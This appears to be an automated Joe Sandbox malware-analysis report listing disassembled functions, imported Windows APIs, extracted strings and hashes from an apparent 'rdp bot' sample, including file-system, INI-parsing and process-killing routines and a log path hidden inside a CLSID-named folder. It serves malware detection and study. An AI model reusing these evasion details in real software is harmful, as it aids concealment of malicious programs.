(hnd != NULL), xrefs: 00007FFE11506D4A
(path_sz != NULL), xrefs: 00007FFE11506DAD
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11506D43, 00007FFE11506D73, 00007FFE11506DA6
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE11506CEB

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
API String ID: 2776309574-3755585189
Opcode ID: c2311c386f09df6b6a9eda7ed4a9fb1ee796fada5a3d4f72b6f2a9a66e2b3150
Instruction ID: 2f8208485d1eb4d612e59b0026d874ca7171d4125a6d20c02cc57da915235ce0
Opcode Fuzzy Hash: c2311c386f09df6b6a9eda7ed4a9fb1ee796fada5a3d4f72b6f2a9a66e2b3150
Instruction Fuzzy Hash: 11319EA1A18D4795FB129FA7E8007B92759BF003BCF9844B6DA0D471B4EF3CA949C311

Function 00007FF76A903835 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF76A90387B
GetFileSize.KERNEL32 ref: 00007FF76A90389E
CloseHandle.KERNEL32 ref: 00007FF76A9038C0
GetLastError.KERNEL32 ref: 00007FF76A903946
GetLastError.KERNEL32 ref: 00007FF76A903A0C

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A903903, 00007FF76A903933
(size != NULL), xrefs: 00007FF76A903925
(path != NULL), xrefs: 00007FF76A9038F5
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A9038EE, 00007FF76A90391E
fs_file_size, xrefs: 00007FF76A9038FC, 00007FF76A90392C

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-3761180060
Opcode ID: 7881fccee05c5221c2473d1a5f04562d3ae20056194d28bf775210df14918d7c
Instruction ID: 2f2dc3bdd1f049f42d5e19ae680fccccfb3c11b04881af6bb60302c23d1e7187
Opcode Fuzzy Hash: 7881fccee05c5221c2473d1a5f04562d3ae20056194d28bf775210df14918d7c
Instruction Fuzzy Hash: 33616115E0C353C6F7606634A044B7BE1419F503E8FB906FAD85EDB6D4DE2DAC8883A1

Function 00007FFE11505B55 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE11505B9B
GetFileSize.KERNEL32 ref: 00007FFE11505BBE
CloseHandle.KERNEL32 ref: 00007FFE11505BE0
GetLastError.KERNEL32 ref: 00007FFE11505C66
GetLastError.KERNEL32 ref: 00007FFE11505D2C

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11505C23, 00007FFE11505C53
fs_file_size, xrefs: 00007FFE11505C1C, 00007FFE11505C4C
(size != NULL), xrefs: 00007FFE11505C45
(path != NULL), xrefs: 00007FFE11505C15
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11505C0E, 00007FFE11505C3E

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-3761180060
Opcode ID: c009bd01cccd0521137d8360388e511eedb2c5f2218c9c8db67dbe29a72d6b15
Instruction ID: 33c902ba592c6e293a952c29c4f1eb95eab6d31e1f1f9512eae1c423a9949c7e
Opcode Fuzzy Hash: c009bd01cccd0521137d8360388e511eedb2c5f2218c9c8db67dbe29a72d6b15
Instruction Fuzzy Hash: 6C616261D2CD5782F7214796A4443BC1249AF0037CF2946FAC95F9B6F0EE2CBD858B52

Function 00007FF76A903B56 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF76A903BB5
GetFileTime.KERNEL32 ref: 00007FF76A903BD0
GetLastError.KERNEL32 ref: 00007FF76A903BDE
CloseHandle.KERNEL32 ref: 00007FF76A903D00

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A903C20, 00007FF76A903C53
(path != NULL), xrefs: 00007FF76A903C12
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FF76A903C45
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A903C0B, 00007FF76A903C3E
fs_file_stat, xrefs: 00007FF76A903C19, 00007FF76A903C4C

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-1574117953
Opcode ID: 6503fd3c71ec1f2c0a17c8cf3aa3bd445eef4d6ac34fdf5946c7a978524476ca
Instruction ID: fb50f54fe1d71b37dd17dfd1ce89d258f9238516deba89514792e957257cd56b
Opcode Fuzzy Hash: 6503fd3c71ec1f2c0a17c8cf3aa3bd445eef4d6ac34fdf5946c7a978524476ca
Instruction Fuzzy Hash: 26516061E0C352CAFB216B249544B7AE1906F007E8FB942BACD1ECB6D0DF2DED459361

Function 00007FF76A9069C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF76A906A5E
strtol.MSVCRT ref: 00007FF76A906A74
_errno.MSVCRT ref: 00007FF76A906A7C
_errno.MSVCRT ref: 00007FF76A906A84

Strings

H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF76A906A2F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A906A44
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF76A906AAC
(value != NULL), xrefs: 00007FF76A906A36
ini_get_uint16, xrefs: 00007FF76A906A3D, 00007FF76A906AA5

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$strtol
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 3596500743-1951032453
Opcode ID: 26b023cdf3c8a21f546063e915a23ba0054b72c6990841bb7ca5d267b8a61738
Instruction ID: 58302566db3d78b0bbc9171dfd4afe38893e6ef41bbbe1e0cee5a6592902c1d2
Opcode Fuzzy Hash: 26b023cdf3c8a21f546063e915a23ba0054b72c6990841bb7ca5d267b8a61738
Instruction Fuzzy Hash: 22217C21A08743D6F722BF15A8407AAB760BB457C4FA040B5EE4C87AA4DF7CE886D710

Function 00007FF76A906CB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF76A906D50
_strtoui64.MSVCRT ref: 00007FF76A906D66
_errno.MSVCRT ref: 00007FF76A906D70
_errno.MSVCRT ref: 00007FF76A906D7C

Strings

ini_get_uint64, xrefs: 00007FF76A906D2F, 00007FF76A906D9C
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF76A906DA3
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF76A906D21
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A906D36
(value != NULL), xrefs: 00007FF76A906D28

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: 78e57a7a08c9cae741ef0bea8fdc423b7346a36cfbff13efa059eb0cd889def9
Instruction ID: 387e4fe3b2710bf6a1214cd9ddbdd681b0616d3f458d78bbe9b4039313037d24
Opcode Fuzzy Hash: 78e57a7a08c9cae741ef0bea8fdc423b7346a36cfbff13efa059eb0cd889def9
Instruction Fuzzy Hash: 7F215E21608B46DAF712AF15F8407AAB3A4FB45784FA440BAEE8C87664DF7CD985C710

Function 00007FF76A904BC4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A904C3D
strlen.MSVCRT ref: 00007FF76A904C59
_mbscat.MSVCRT ref: 00007FF76A904C68
strlen.MSVCRT ref: 00007FF76A904C73

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A904C27
service, xrefs: 00007FF76A904BC7
fs_module_file, xrefs: 00007FF76A904C20
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A904C12
(file_path != NULL), xrefs: 00007FF76A904C19

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$_mbscat
String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file$service
API String ID: 3951308622-2217284372
Opcode ID: 447ed48d09f86569cbc36a8a8807c8874fe1818e0a9ef4791dac73f7df4624e8
Instruction ID: 68a76a5733bd3401f3eb5deff269a9ff5604d9612eccf70d4a19352454bd31a9
Opcode Fuzzy Hash: 447ed48d09f86569cbc36a8a8807c8874fe1818e0a9ef4791dac73f7df4624e8
Instruction Fuzzy Hash: FA11D621E0C747C8FB057F1998507B9E6815F61BC8FEC80B4DE4D8B2C6DE2C98108760

Function 00007FF76A906790 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF76A90687C

Strings

(name != NULL), xrefs: 00007FF76A906805
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FF76A9068F5
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF76A9067CB, 00007FF76A9067FE, 00007FF76A906831
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9067E0, 00007FF76A906813, 00007FF76A906846
(var != NULL), xrefs: 00007FF76A906838
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FF76A9068AD
ini_get_var, xrefs: 00007FF76A9067D9, 00007FF76A90680C, 00007FF76A90683F, 00007FF76A9068A6, 00007FF76A9068EE
(sec != NULL), xrefs: 00007FF76A9067D2
NULL, xrefs: 00007FF76A90690E, 00007FF76A906917

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-2568489879
Opcode ID: 987dfc7314daebac08b7d1d03a222a5fd5fa2b1a15d552217955ab942cc0a28e
Instruction ID: 3600b38c80b2179724c7b9ad62234608651b74bce66d011e814aa1fc04db6b05
Opcode Fuzzy Hash: 987dfc7314daebac08b7d1d03a222a5fd5fa2b1a15d552217955ab942cc0a28e
Instruction Fuzzy Hash: 29412D61A09747DAFA15BB04E9007F5A360FB05384FE441FADA5C9A195DF7CE989C320

Function 00007FF76A906609 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF76A9066FD

Strings

(name != NULL), xrefs: 00007FF76A90667E
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF76A906644, 00007FF76A906677, 00007FF76A9066AA
(ini != NULL), xrefs: 00007FF76A90664B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A906659, 00007FF76A90668C, 00007FF76A9066BF
ini_get_sec, xrefs: 00007FF76A906652, 00007FF76A906685, 00007FF76A9066B8, 00007FF76A906716, 00007FF76A906754
[D] (%s) -> Done(name=%s), xrefs: 00007FF76A90671D
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF76A90675B
(sec != NULL), xrefs: 00007FF76A9066B1
NULL, xrefs: 00007FF76A906774

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-3977765790
Opcode ID: c37977804aa331a37b850de826347f7ffc720abc1c8905eb7b42f2c147ac0dd7
Instruction ID: 2ef33472e9d77411d1af4ac370c6189dd14edbc4ae7a78655ec1bcac94da8e2b
Opcode Fuzzy Hash: c37977804aa331a37b850de826347f7ffc720abc1c8905eb7b42f2c147ac0dd7
Instruction Fuzzy Hash: 0A416261A09747D6FA12BB00E9007B4A750FF01388FF441FADA5C8A5A5EF7CEA85C320

Function 00007FF76A906B40 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF76A906BDA
_errno.MSVCRT ref: 00007FF76A906BF8
_errno.MSVCRT ref: 00007FF76A906C04

Strings

[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF76A906C2B
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF76A906BAB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A906BC0
ini_get_uint32, xrefs: 00007FF76A906BB9, 00007FF76A906C24
(value != NULL), xrefs: 00007FF76A906BB2

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-719680006
Opcode ID: b647b4fb1f849b18d37e1820531bc261b777ad14990052b4b0321f78fd1f4710
Instruction ID: 78e8a9905c70842b90029c04737d37d25279da20b546f3e6909ab4a92fd76da0
Opcode Fuzzy Hash: b647b4fb1f849b18d37e1820531bc261b777ad14990052b4b0321f78fd1f4710
Instruction Fuzzy Hash: 1E216261A08746DAF722BF14EC407A9B7A4BB45784FA440B5EE8C87654DF7CD885CB20

Function 00007FFE11507940 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE115079DA
_errno.MSVCRT ref: 00007FFE115079F8
_errno.MSVCRT ref: 00007FFE11507A04

Strings

ini_get_uint32, xrefs: 00007FFE115079B9, 00007FFE11507A24
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE11507A2B
(value != NULL), xrefs: 00007FFE115079B2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115079C0
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE115079AB

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-719680006
Opcode ID: 473512c0c2058ff943e3dd15818fe718e05bfa88496eb265e96496a5be53cbc8
Instruction ID: 56f7bb06b52edabb2b54db7210d7814a72285257f1ba0087e956df4e217e29d3
Opcode Fuzzy Hash: 473512c0c2058ff943e3dd15818fe718e05bfa88496eb265e96496a5be53cbc8
Instruction Fuzzy Hash: 9521E261A08E4396E7229F66F8407AE3369BB447A4F4441B6EE8C47674DF7CD945C700

Function 00007FFE1150B9B4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE1150B8C9
Process32Next.KERNEL32 ref: 00007FFE1150B8DF
strcmp.MSVCRT ref: 00007FFE1150B921
OpenProcess.KERNEL32 ref: 00007FFE1150B939
TerminateProcess.KERNEL32 ref: 00007FFE1150B953
GetLastError.KERNEL32 ref: 00007FFE1150B961
GetLastError.KERNEL32 ref: 00007FFE1150BB38

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FFE1150B973
process_kill, xrefs: 00007FFE1150B96C

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 477549591-1116693529
Opcode ID: 287bc51cedacec2085a2b6bbd98ea20e627747aadacb9a38d55f742ae79f1610
Instruction ID: 934095f5559e1375f5b48b1b764efe8e8d514c29d6168c1011ab626ce38d276c
Opcode Fuzzy Hash: 287bc51cedacec2085a2b6bbd98ea20e627747aadacb9a38d55f742ae79f1610
Instruction Fuzzy Hash: 7F218E59F0CF0346FB659FA7A4C037E139AAF547A0F0440B9CC0E462B5EE2DE9488341

Function 00007FFE1150B8A5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE1150B8C9
Process32Next.KERNEL32 ref: 00007FFE1150B8DF
strcmp.MSVCRT ref: 00007FFE1150B921
OpenProcess.KERNEL32 ref: 00007FFE1150B939
TerminateProcess.KERNEL32 ref: 00007FFE1150B953
GetLastError.KERNEL32 ref: 00007FFE1150B961
GetLastError.KERNEL32 ref: 00007FFE1150BB38

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FFE1150B973
process_kill, xrefs: 00007FFE1150B96C

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 477549591-1116693529
Opcode ID: 10e7ed104809cb2c5c3085f8bda7e35f7484c2652a7858b90afc65e94441acdf
Instruction ID: f8aedc411b760dacd0c8bf5a382f433f687d7e28fb9ae496b94c05040c345051
Opcode Fuzzy Hash: 10e7ed104809cb2c5c3085f8bda7e35f7484c2652a7858b90afc65e94441acdf
Instruction Fuzzy Hash: E3218E59F0CF0346FB659FA7A4D037E139AAF507A0F0444B9CC0E462B5EE2DE9488341

Function 00007FFE1150B8AC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE1150B8C9
Process32Next.KERNEL32 ref: 00007FFE1150B8DF
strcmp.MSVCRT ref: 00007FFE1150B921
OpenProcess.KERNEL32 ref: 00007FFE1150B939
TerminateProcess.KERNEL32 ref: 00007FFE1150B953
GetLastError.KERNEL32 ref: 00007FFE1150B961
GetLastError.KERNEL32 ref: 00007FFE1150BB38

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FFE1150B973
process_kill, xrefs: 00007FFE1150B96C

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

